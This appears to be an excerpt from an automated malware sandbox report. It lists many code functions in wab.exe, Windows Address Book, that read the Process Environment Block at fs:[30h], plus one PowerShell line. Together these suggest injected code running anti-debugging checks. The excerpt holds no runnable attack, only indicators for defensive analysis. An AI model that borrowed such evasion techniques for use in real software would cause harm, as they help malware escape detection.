Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02A7D8A4 LdrInitializeThunk, 5_2_02A7D8A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E016 mov eax, dword ptr fs:[00000030h] 11_2_2013E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E903E mov eax, dword ptr fs:[00000030h] 11_2_201E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A020 mov eax, dword ptr fs:[00000030h] 11_2_2011A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C020 mov eax, dword ptr fs:[00000030h] 11_2_2011C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20122050 mov eax, dword ptr fs:[00000030h] 11_2_20122050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201C705E mov ebx, dword ptr fs:[00000030h] 11_2_201C705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201C705E mov eax, dword ptr fs:[00000030h] 11_2_201C705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B052 mov eax, dword ptr fs:[00000030h] 11_2_2014B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov ecx, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131070 mov eax, dword ptr fs:[00000030h] 11_2_20131070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014C073 mov eax, dword ptr fs:[00000030h] 11_2_2014C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5060 mov eax, dword ptr fs:[00000030h] 11_2_201F5060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20125096 mov eax, dword ptr fs:[00000030h] 11_2_20125096
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014D090 mov eax, dword ptr fs:[00000030h] 11_2_2014D090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015909C mov eax, dword ptr fs:[00000030h] 11_2_2015909C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012208A mov eax, dword ptr fs:[00000030h] 11_2_2012208A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011D08D mov eax, dword ptr fs:[00000030h] 11_2_2011D08D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E60B8 mov eax, dword ptr fs:[00000030h] 11_2_201E60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E60B8 mov ecx, dword ptr fs:[00000030h] 11_2_201E60B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A20DE mov eax, dword ptr fs:[00000030h] 11_2_201A20DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F50D9 mov eax, dword ptr fs:[00000030h] 11_2_201F50D9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201490DB mov eax, dword ptr fs:[00000030h] 11_2_201490DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov ecx, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov ecx, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C0F0 mov eax, dword ptr fs:[00000030h] 11_2_2011C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201620F0 mov ecx, dword ptr fs:[00000030h] 11_2_201620F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201450E4 mov eax, dword ptr fs:[00000030h] 11_2_201450E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201450E4 mov ecx, dword ptr fs:[00000030h] 11_2_201450E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A0E3 mov ecx, dword ptr fs:[00000030h] 11_2_2011A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201280E9 mov eax, dword ptr fs:[00000030h] 11_2_201280E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 mov ecx, dword ptr fs:[00000030h] 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 mov eax, dword ptr fs:[00000030h] 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 mov eax, dword ptr fs:[00000030h] 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 mov eax, dword ptr fs:[00000030h] 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E0115 mov eax, dword ptr fs:[00000030h] 11_2_201E0115
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121131 mov eax, dword ptr fs:[00000030h] 11_2_20121131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121131 mov eax, dword ptr fs:[00000030h] 11_2_20121131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B136 mov eax, dword ptr fs:[00000030h] 11_2_2011B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B136 mov eax, dword ptr fs:[00000030h] 11_2_2011B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B136 mov eax, dword ptr fs:[00000030h] 11_2_2011B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B136 mov eax, dword ptr fs:[00000030h] 11_2_2011B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20150124 mov eax, dword ptr fs:[00000030h] 11_2_20150124
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20127152 mov eax, dword ptr fs:[00000030h] 11_2_20127152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20126154 mov eax, dword ptr fs:[00000030h] 11_2_20126154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20126154 mov eax, dword ptr fs:[00000030h] 11_2_20126154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C156 mov eax, dword ptr fs:[00000030h] 11_2_2011C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5152 mov eax, dword ptr fs:[00000030h] 11_2_201F5152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119148 mov eax, dword ptr fs:[00000030h] 11_2_20119148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119148 mov eax, dword ptr fs:[00000030h] 11_2_20119148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119148 mov eax, dword ptr fs:[00000030h] 11_2_20119148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119148 mov eax, dword ptr fs:[00000030h] 11_2_20119148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov eax, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov eax, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov ecx, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov eax, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov eax, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B9179 mov eax, dword ptr fs:[00000030h] 11_2_201B9179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A019F mov eax, dword ptr fs:[00000030h] 11_2_201A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A019F mov eax, dword ptr fs:[00000030h] 11_2_201A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A019F mov eax, dword ptr fs:[00000030h] 11_2_201A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A019F mov eax, dword ptr fs:[00000030h] 11_2_201A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A197 mov eax, dword ptr fs:[00000030h] 11_2_2011A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A197 mov eax, dword ptr fs:[00000030h] 11_2_2011A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A197 mov eax, dword ptr fs:[00000030h] 11_2_2011A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20160185 mov eax, dword ptr fs:[00000030h] 11_2_20160185
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DC188 mov eax, dword ptr fs:[00000030h] 11_2_201DC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DC188 mov eax, dword ptr fs:[00000030h] 11_2_201DC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013B1B0 mov eax, dword ptr fs:[00000030h] 11_2_2013B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D11A4 mov eax, dword ptr fs:[00000030h] 11_2_201D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D11A4 mov eax, dword ptr fs:[00000030h] 11_2_201D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D11A4 mov eax, dword ptr fs:[00000030h] 11_2_201D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D11A4 mov eax, dword ptr fs:[00000030h] 11_2_201D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015D1D0 mov eax, dword ptr fs:[00000030h] 11_2_2015D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015D1D0 mov ecx, dword ptr fs:[00000030h] 11_2_2015D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F51CB mov eax, dword ptr fs:[00000030h] 11_2_201F51CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E61C3 mov eax, dword ptr fs:[00000030h] 11_2_201E61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E61C3 mov eax, dword ptr fs:[00000030h] 11_2_201E61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201501F8 mov eax, dword ptr fs:[00000030h] 11_2_201501F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F61E5 mov eax, dword ptr fs:[00000030h] 11_2_201F61E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201251ED mov eax, dword ptr fs:[00000030h] 11_2_201251ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20157208 mov eax, dword ptr fs:[00000030h] 11_2_20157208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20157208 mov eax, dword ptr fs:[00000030h] 11_2_20157208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011823B mov eax, dword ptr fs:[00000030h] 11_2_2011823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5227 mov eax, dword ptr fs:[00000030h] 11_2_201F5227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A250 mov eax, dword ptr fs:[00000030h] 11_2_2011A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DB256 mov eax, dword ptr fs:[00000030h] 11_2_201DB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DB256 mov eax, dword ptr fs:[00000030h] 11_2_201DB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20126259 mov eax, dword ptr fs:[00000030h] 11_2_20126259
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119240 mov eax, dword ptr fs:[00000030h] 11_2_20119240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119240 mov eax, dword ptr fs:[00000030h] 11_2_20119240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015724D mov eax, dword ptr fs:[00000030h] 11_2_2015724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20149274 mov eax, dword ptr fs:[00000030h] 11_2_20149274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20161270 mov eax, dword ptr fs:[00000030h] 11_2_20161270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20161270 mov eax, dword ptr fs:[00000030h] 11_2_20161270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20124260 mov eax, dword ptr fs:[00000030h] 11_2_20124260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20124260 mov eax, dword ptr fs:[00000030h] 11_2_20124260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20124260 mov eax, dword ptr fs:[00000030h] 11_2_20124260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201ED26B mov eax, dword ptr fs:[00000030h] 11_2_201ED26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201ED26B mov eax, dword ptr fs:[00000030h] 11_2_201ED26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011826B mov eax, dword ptr fs:[00000030h] 11_2_2011826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015329E mov eax, dword ptr fs:[00000030h] 11_2_2015329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015329E mov eax, dword ptr fs:[00000030h] 11_2_2015329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E284 mov eax, dword ptr fs:[00000030h] 11_2_2015E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E284 mov eax, dword ptr fs:[00000030h] 11_2_2015E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A0283 mov eax, dword ptr fs:[00000030h] 11_2_201A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A0283 mov eax, dword ptr fs:[00000030h] 11_2_201A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A0283 mov eax, dword ptr fs:[00000030h] 11_2_201A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5283 mov eax, dword ptr fs:[00000030h] 11_2_201F5283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A92BC mov eax, dword ptr fs:[00000030h] 11_2_201A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A92BC mov eax, dword ptr fs:[00000030h] 11_2_201A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A92BC mov ecx, dword ptr fs:[00000030h] 11_2_201A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A92BC mov ecx, dword ptr fs:[00000030h] 11_2_201A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 mov eax, dword ptr fs:[00000030h] 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 mov eax, dword ptr fs:[00000030h] 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 mov eax, dword ptr fs:[00000030h] 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 mov eax, dword ptr fs:[00000030h] 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E92A6 mov eax, dword ptr fs:[00000030h] 11_2_201E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E92A6 mov eax, dword ptr fs:[00000030h] 11_2_201E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E92A6 mov eax, dword ptr fs:[00000030h] 11_2_201E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E92A6 mov eax, dword ptr fs:[00000030h] 11_2_201E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B72A0 mov eax, dword ptr fs:[00000030h] 11_2_201B72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B72A0 mov eax, dword ptr fs:[00000030h] 11_2_201B72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov ecx, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B2D3 mov eax, dword ptr fs:[00000030h] 11_2_2011B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B2D3 mov eax, dword ptr fs:[00000030h] 11_2_2011B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B2D3 mov eax, dword ptr fs:[00000030h] 11_2_2011B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F2D0 mov eax, dword ptr fs:[00000030h] 11_2_2014F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F2D0 mov eax, dword ptr fs:[00000030h] 11_2_2014F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201292C5 mov eax, dword ptr fs:[00000030h] 11_2_201292C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201292C5 mov eax, dword ptr fs:[00000030h] 11_2_201292C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF2F8 mov eax, dword ptr fs:[00000030h] 11_2_201DF2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201192FF mov eax, dword ptr fs:[00000030h] 11_2_201192FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
